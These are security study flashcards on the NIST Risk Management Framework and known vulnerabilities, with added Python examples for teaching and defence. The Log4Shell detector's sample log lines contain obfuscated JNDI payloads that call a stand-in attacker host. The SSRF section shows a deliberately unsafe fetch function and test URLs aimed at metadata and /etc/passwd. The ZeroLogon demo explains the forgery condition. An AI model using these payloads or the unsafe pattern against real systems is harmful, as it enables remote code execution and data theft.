Risk Management and NIST RMF Flashcards
What is the 5th step of the NIST RMF
Assess:
to determine whether the selected controls are implemented correctly, operating as intended, and producing the desired outcome
What is the 6th Step of the NIST RMF?
Authorize:
a senior official formally accepts accountability for the security and privacy risks that remain after assessment and decides whether the system is approved to operate
What is Business continuity?
An organization’s ability to maintain its everyday productivity by establishing risk management and disaster recovery plans
What is the 2nd Step of the NIST RMF?
Categorize:
classify the system and the information it processes by the impact a loss would have; the result is used to develop risk management processes and tasks
What is an External threat?
Anything outside the organization that has the potential to harm organizational assets
What is the 4th step of the NIST RMF?
Implement:
put the selected controls in place and document how they are deployed, in line with the organization’s security and privacy plans
What is an Internal threat?
A current or former employee, external vendor, or trusted partner who poses a security risk
What is the 7th step of the NIST RMF?
Monitor: continuously track how systems and their controls are operating, so that changes and new risks are detected and reported on an ongoing basis
What is the 1st step of the NIST RMF?
Prepare: related to activities that are necessary to manage security and privacy risks before a breach occurs
What is Ransomware?
A malicious attack where threat actors encrypt an organization’s data and demand payment to restore access
What is Risk?
Anything that can impact the confidentiality, integrity, or availability of an asset
What is Risk mitigation?
The process of having the right procedures and rules in place to quickly reduce the impact of a risk like a breach
What is Security posture?
An organization’s ability to manage its defence of critical assets and data and react to change
What is the 3rd step of NIST RMF?
Select: means to choose, customize, and capture documentation of the controls that protect an organization
What is meant by Shared responsibility?
The idea that all individuals within an organization take an active role in lowering risk and maintaining both physical and virtual security
What is Social engineering?
A manipulation technique that exploits human error to gain private information, access, or valuables
What is a Vulnerability?
A weakness that can be exploited by a threat
What are the 7 steps in the NIST RMF?
1. Prepare
2. Categorize
3. Select
4. Implement
5. Assess
6. Authorize
7. Monitor
What does NIST RMF mean?
National Institute of Standards and Technology (NIST) Risk Management Framework (RMF)
Which of the following is the first step in the NIST Risk Management Framework (RMF)?
(a) Prepare
(b) Categorize
(c) Select
(d) Implement
(a) Prepare
What is the purpose of the “select” step in the RMF?
(a) To develop risk management processes and tasks
(b) To choose, customize, and capture documentation of controls
(c) To implement security and privacy plans
(d) To determine if established controls are implemented correctly
(b) To choose, customize, and capture documentation of controls
Which of the following is NOT a task that an entry-level security analyst may perform as part of the RMF?
(a) Monitoring for risks
(b) Developing plans of action
(c) Generating reports
(d) Establishing project milestones
(b) Developing plans of action
The RMF is only used by security professionals with advanced experience. (True/False)
False
The “monitor” step in the RMF involves assessing and maintaining technical operations. (True/False)
True
Entry-level security analysts are not responsible for understanding how to mitigate and manage risks. (True/False)
False
Digital assets include the personal information of employees, clients, or vendors, such as:
Social Security Numbers (SSNs), or unique national identification numbers assigned to individuals
Dates of birth
Bank account numbers
Mailing addresses
Examples of physical assets include:
Payment kiosks
Servers
Desktop computers
Office spaces
List some common strategies used to manage risks:
Acceptance: Accepting a risk to avoid disrupting business continuity
Avoidance: Creating a plan to avoid the risk altogether
Transference: Transferring risk to a third party to manage
Mitigation: Lessening the impact of a known risk
What are the different factors that can affect the likelihood of a risk to an organization’s assets?
External risk: Anything outside the organization that has the potential to harm organizational assets, such as threat actors attempting to gain access to private information
Internal risk: A current or former employee, vendor, or trusted partner who poses a security risk
Legacy systems: Old systems that might not be accounted for or updated, but can still impact assets, such as workstations or old mainframe systems. For example, an organization might have an old vending machine that takes credit card payments or a workstation that is still connected to the legacy accounting system.
Multiparty risk: Outsourcing work to third-party vendors can give them access to intellectual property, such as trade secrets, software designs, and inventions.
Software compliance/licensing: Software that is not updated or in compliance, or patches that are not installed in a timely manner
Which resource regularly updates and publishes a standard awareness document about the top 10 most critical security risks to web applications?
Open Web Application Security Project (OWASP)
Which types of vulnerabilities within their systems should organizations regularly inspect for?
ProxyLogon (CVE-2021-26855): A pre-authentication vulnerability in on-premises Microsoft Exchange Server. Because it is exploitable before authentication, a remote threat actor needs no valid credentials: they can bypass the user authentication process, act as a privileged Exchange user, and chain further flaws to deploy malicious code on the server from a remote location.
ZeroLogon (CVE-2020-1472): A vulnerability in Microsoft’s Netlogon Remote Protocol. An authentication protocol is a way to verify the identity of a user or computer; Netlogon is the Windows service that domain-joined computers and domain controllers use to authenticate each other in an Active Directory domain. The flaw is cryptographic: Netlogon used AES-CFB8 with an all-zero initialization vector, so an unauthenticated attacker on the network could spoof the authentication handshake, reset a domain controller’s machine account password, and take over the domain.
Log4Shell (CVE-2021-44228): A remote code execution vulnerability in the Apache Log4j 2 Java logging library. When a string such as ${jndi:ldap://attacker-host/a} appears in a value that gets logged (a User-Agent header, a username), vulnerable versions perform a JNDI lookup, fetch attacker-controlled content from that address and run the resulting Java code, letting a remote attacker take control of the affected device or leak sensitive information.
PetitPotam (CVE-2021-36942): An authentication-coercion and NTLM relay technique that affects Windows NT LAN Manager (NTLM) authentication. By abusing the MS-EFSRPC interface, a LAN-based attacker can force a Windows host, including a domain controller, to initiate an NTLM authentication request to an attacker-controlled machine, where it can be relayed to other services such as Active Directory Certificate Services.
Security logging and monitoring failures: Insufficient logging, alerting, and monitoring, so that attackers can exploit vulnerabilities, maintain access, and move through an organization’s systems without the organization knowing it
Server-side request forgery (SSRF): A flaw that lets an attacker make a server-side application send requests to destinations the attacker chooses, including internal backend resources that are not reachable from outside. It can allow threat actors to read or modify backend resources and to steal data.
What is ProxyLogon?
A pre-authentication vulnerability (CVE-2021-26855) in on-premises Microsoft Exchange Server. Because it is exploitable before authentication, a remote threat actor can bypass the user authentication process, act as a privileged Exchange user, and chain further flaws to deploy malicious code on the server from a remote location
What is ZeroLogon?
A vulnerability (CVE-2020-1472) in Microsoft’s Netlogon Remote Protocol. An authentication protocol is a way to verify the identity of a user or computer; Netlogon is the Windows service that domain-joined computers and domain controllers use to authenticate each other in an Active Directory domain. Netlogon used AES-CFB8 with an all-zero initialization vector, so an unauthenticated attacker on the network could spoof the handshake, reset a domain controller’s machine account password, and take over the domain.
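The ZeroLogon cards above describe a cryptographic flaw without showing why it works. The script below is an added example, not part of these flashcards or of Microsoft’s code: it implements CFB8 mode and shows that with an all-zero IV and an all-zero 8-byte challenge, an all-zero credential is accepted for about 1 key in 256, which is exactly the retry budget the attack needs. Assumptions: HMAC-SHA256 truncated to 16 bytes stands in for AES (CFB only needs the encrypt direction and the weakness is a property of the mode plus the zero IV, not of AES), and the session keys are constructed deterministically so the run is reproducible.

```python
import hashlib
import hmac

BLOCK_SIZE = 16  # AES has a 16-byte block; Netlogon uses AES-128 in CFB8 mode


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Forward direction of a 16-byte block cipher keyed with `key`.

    Assumption made here so the script runs with the standard library only:
    HMAC-SHA256 truncated to one block stands in for AES. CFB mode only ever
    uses the encrypt direction, and the ZeroLogon weakness is a property of
    the mode plus the zero IV, not of AES itself, so the demonstration is the
    same for any keyed pseudorandom block function.
    """
    assert len(block) == BLOCK_SIZE
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK_SIZE]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: encrypt the shift register, XOR its first byte into one plaintext
    byte, then shift the resulting ciphertext byte into the register."""
    reg = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream_byte = block_encrypt(key, bytes(reg))[0]
        c = p ^ keystream_byte
        out.append(c)
        reg = reg[1:] + bytes([c])
    return bytes(out)


def cfb8_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    reg = bytearray(iv)
    out = bytearray()
    for c in ciphertext:
        keystream_byte = block_encrypt(key, bytes(reg))[0]
        out.append(c ^ keystream_byte)
        reg = reg[1:] + bytes([c])
    return bytes(out)


def zero_iv_forgery_works(session_key: bytes) -> bool:
    """The ZeroLogon condition. Netlogon computed the client credential as
    CFB8(session_key, IV = 16 zero bytes, client_challenge). An attacker who
    does not know session_key sends an all-zero 8-byte challenge together with
    an all-zero 8-byte credential; the server accepts when the two agree."""
    forged_credential = bytes(8)
    return cfb8_encrypt(session_key, bytes(BLOCK_SIZE), bytes(8)) == forged_credential


def first_keystream_byte_is_zero(session_key: bytes) -> bool:
    """Why it works 1 time in 256: with IV = 0 and plaintext = 0, the first
    ciphertext byte is E_k(0)[0]. If that byte is 0, the shift register never
    changes, so every later keystream byte is the same 0 and the whole
    credential is zero. This condition is exactly equivalent to the one above."""
    return block_encrypt(session_key, bytes(BLOCK_SIZE))[0] == 0


def demo_key(i: int) -> bytes:
    """Constructed, deterministic stand-in for the i-th fresh session key."""
    return hashlib.sha256(b"constructed-session-key-" + i.to_bytes(4, "big")).digest()[:16]


def count_forgeable_keys(n_keys: int) -> int:
    """How many of n_keys session keys accept the all-zero credential.
    Every failed attempt makes the server pick a new challenge, hence a new
    key, so the attacker simply retries; expect about n_keys / 256 hits."""
    return sum(1 for i in range(n_keys) if zero_iv_forgery_works(demo_key(i)))


if __name__ == "__main__":
    n = 4096
    print(f"{count_forgeable_keys(n)} of {n} keys accept an all-zero credential (expected about {n // 256})")
```

The fix Microsoft shipped did not change the mode; it made the signed and sealed Netlogon secure channel mandatory so that unauthenticated callers can no longer reach the vulnerable handshake, which is why patching the domain controllers and then enabling enforcement mode were both required.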
What is Log4Shell?
A remote code execution vulnerability (CVE-2021-44228) in the Apache Log4j 2 Java logging library. When a string such as ${jndi:ldap://attacker-host/a} appears in a value that gets logged, vulnerable versions perform a JNDI lookup, fetch attacker-controlled content from that address and run the resulting Java code, letting a remote attacker take control of the affected device or leak sensitive information.
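Both Log4Shell cards say the trigger is a ${jndi:...} string in logged input, which is also what a detection has to look for. The scanner below is an added example written for these notes, not code from the flashcards or from the Log4j project: it de-obfuscates the nested-lookup tricks attackers used to hide the word "jndi" (${lower:...}, ${upper:...} and the ${...:-default} fallback) and runs over a handful of constructed access-log lines. The log lines, hostnames and addresses are made up for the demonstration.

```python
import re

# A JNDI lookup at any nesting level, e.g. "${jndi:ldap://host/a}"; case-insensitive
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# An innermost "${...}" lookup: its body contains no nested "${" and no "}"
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def _resolve_lookup(match: re.Match) -> str:
    """Resolve one innermost lookup the way Log4j 2 would, for the handful of
    lookups attackers use to hide the string 'jndi' from naive filters."""
    body = match.group(1)
    if ":-" in body:
        # "${prefix:key:-default}": an unknown key falls back to the default text,
        # so "${::-j}" and "${env:NOPE:-j}" both become "j"
        return body.split(":-", 1)[1]
    if ":" in body:
        prefix, arg = body.split(":", 1)
        prefix = prefix.strip().lower()
        if prefix == "lower":
            return arg.lower()
        if prefix == "upper":
            return arg.upper()
    # Anything else (including "${jndi:...}" itself) is left untouched, which
    # also guarantees the rewrite loop in normalize() terminates.
    return match.group(0)


def normalize(value: str, max_rounds: int = 32) -> str:
    """Peel nested lookups from the inside out until the text stops changing."""
    for _ in range(max_rounds):
        rewritten = INNERMOST_LOOKUP.sub(_resolve_lookup, value)
        if rewritten == value:
            break
        value = rewritten
    return value


def is_log4shell_probe(value: str) -> bool:
    """True if the raw text, or the text after de-obfuscation, contains a JNDI lookup."""
    return bool(JNDI_LOOKUP.search(value)) or bool(JNDI_LOOKUP.search(normalize(value)))


# Constructed web-server access log lines (not real traffic). The User-Agent
# field is a common carrier for Log4Shell probes because it is routinely logged.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://attacker.example/a}"',
    '198.51.100.7 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '198.51.100.7 - - [10/Dec/2021:12:00:04 +0000] "GET /x HTTP/1.1" 200 10 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:05 +0000] "GET /report?fmt=${date:yyyy} HTTP/1.1" 200 99 "-" "curl/7.79"',
]


def scan(lines) -> list:
    """Return (line number, de-obfuscated line) for every line that carries a probe."""
    return [(i, normalize(line)) for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for i, line in scan(SAMPLE_LOG_LINES):
        print(f"line {i}: {line}")
```

Two caveats for real use: URL-encoded payloads (%24%7Bjndi...) must be percent-decoded before scanning, and a hit in your web logs means a probe reached you, not that the Java application behind it was vulnerable; correlate with outbound LDAP, RMI or DNS connections from the application host to confirm exploitation.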
What is PetitPotam?
An authentication-coercion and NTLM relay technique (CVE-2021-36942) that affects Windows NT LAN Manager (NTLM) authentication. By abusing the MS-EFSRPC interface, a LAN-based attacker can force a Windows host, including a domain controller, to initiate an NTLM authentication request to an attacker-controlled machine, where it can be relayed to other services such as Active Directory Certificate Services.
Security logging and monitoring failures can result in …?
Insufficient logging, alerting, and monitoring let attackers exploit vulnerabilities, maintain access, and move through an organization’s systems without the organization knowing it
What can result from a Server-side request forgery (SSRF) vulnerability?
It lets an attacker make a server-side application send requests to destinations the attacker chooses, including internal backend resources that are not reachable from outside, so threat actors can read or modify backend resources and steal data.
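The SSRF entries above describe the impact but not the control. The code below is an added example for these notes, not from the flashcards or any particular framework: it shows the vulnerable pattern (a server fetching a client-supplied URL) next to a validator that enforces an allowlist of hostnames, rejects non-http(s) schemes and embedded credentials, and checks the resolved addresses so that an allowlisted name that resolves to loopback, RFC 1918 or the link-local metadata range (169.254.169.254) is refused too. The allowlist, the DNS answers and the IP addresses are constructed for an offline run; a real deployment would pass system_resolver instead.

```python
import ipaddress
import socket
from typing import Callable, Iterable, Tuple
from urllib.parse import urlsplit


def fetch_vulnerable(url: str) -> bytes:
    """The vulnerable pattern (shown for contrast, never called here): the server
    fetches whatever URL the client supplies, so "http://127.0.0.1:8080/admin" or
    a cloud metadata address reaches the backend with the server's own network
    position and credentials."""
    import urllib.request
    return urllib.request.urlopen(url).read()  # intentionally unsafe


def is_public_ip(addr: str) -> bool:
    """Reject loopback, RFC 1918, link-local (includes 169.254.169.254),
    multicast, reserved and unspecified addresses, for both IPv4 and IPv6."""
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_target(url: str, allowed_hosts: Iterable[str],
                    resolver: Callable[[str], Iterable[str]]) -> Tuple[str, list]:
    """Return (host, resolved_ips) for a URL the server may fetch; raise ValueError otherwise."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        # "http://images.example.com@evil.example/" has hostname evil.example
        raise ValueError("credentials in URL are not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    host = host.lower().rstrip(".")
    if host not in {h.lower() for h in allowed_hosts}:
        raise ValueError(f"host not on allowlist: {host!r}")
    if parts.port not in (None, 80, 443):
        raise ValueError(f"port not allowed: {parts.port}")
    ips = list(resolver(host))
    if not ips:
        raise ValueError(f"host did not resolve: {host!r}")
    for ip in ips:
        # an allowlisted name may still point inside (misconfiguration or DNS rebinding)
        if not is_public_ip(ip):
            raise ValueError(f"{host} resolves to non-public address {ip}")
    return host, ips


def check(url: str, allowed_hosts: Iterable[str],
          resolver: Callable[[str], Iterable[str]]) -> Tuple[bool, str]:
    """Convenience wrapper: (True, 'host -> ips') or (False, reason)."""
    try:
        host, ips = validate_target(url, allowed_hosts, resolver)
    except ValueError as exc:
        return False, str(exc)
    return True, f"{host} -> {', '.join(ips)}"


def system_resolver(host: str) -> list:
    """Real resolver for production use (not used by the constructed demo below)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


# Constructed allowlist and DNS answers for an offline demonstration; the
# names and addresses are illustrative, not real infrastructure.
ALLOWED_HOSTS = frozenset({"images.example.com", "internal.example.com"})
CONSTRUCTED_DNS = {
    "images.example.com": ["93.184.216.34"],      # a public address: allowed
    "internal.example.com": ["10.0.0.5"],         # allowlisted by mistake, but private
    "evil.example": ["169.254.169.254"],          # points at the cloud metadata service
}


def constructed_resolver(host: str) -> list:
    return CONSTRUCTED_DNS.get(host, [])


if __name__ == "__main__":
    for url in ("https://images.example.com/cat.png",
                "http://169.254.169.254/latest/meta-data/",
                "http://images.example.com@evil.example/",
                "https://internal.example.com/",
                "file:///etc/passwd"):
        print(url, "->", check(url, ALLOWED_HOSTS, constructed_resolver))
```

The validation is only half the control: the HTTP client that follows it must connect to the address that was checked (and disable or re-validate redirects), otherwise a second DNS answer or a 302 to an internal address reintroduces the hole.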
Which of the following is a common risk management strategy?
(a) Acceptance
(b) Avoidance
(c) Transference
(d) All of the above
(d) All of the above
Which of the following is a type of threat?
(a) Insider threat
(b) Advanced persistent threat (APT)
(c) Legacy system
(d) Software compliance/licensing
(a) Insider threat
Which of the following is a type of vulnerability?
(a) ProxyLogon
(b) ZeroLogon
(c) Log4Shell
(d) All of the above
(d) All of the above
Risk is the likelihood of a threat (True/False)
True
Vulnerabilities are weaknesses that can be exploited by threats (True/False)
True
Security logging and monitoring failures are not a type of vulnerability (True/False)
False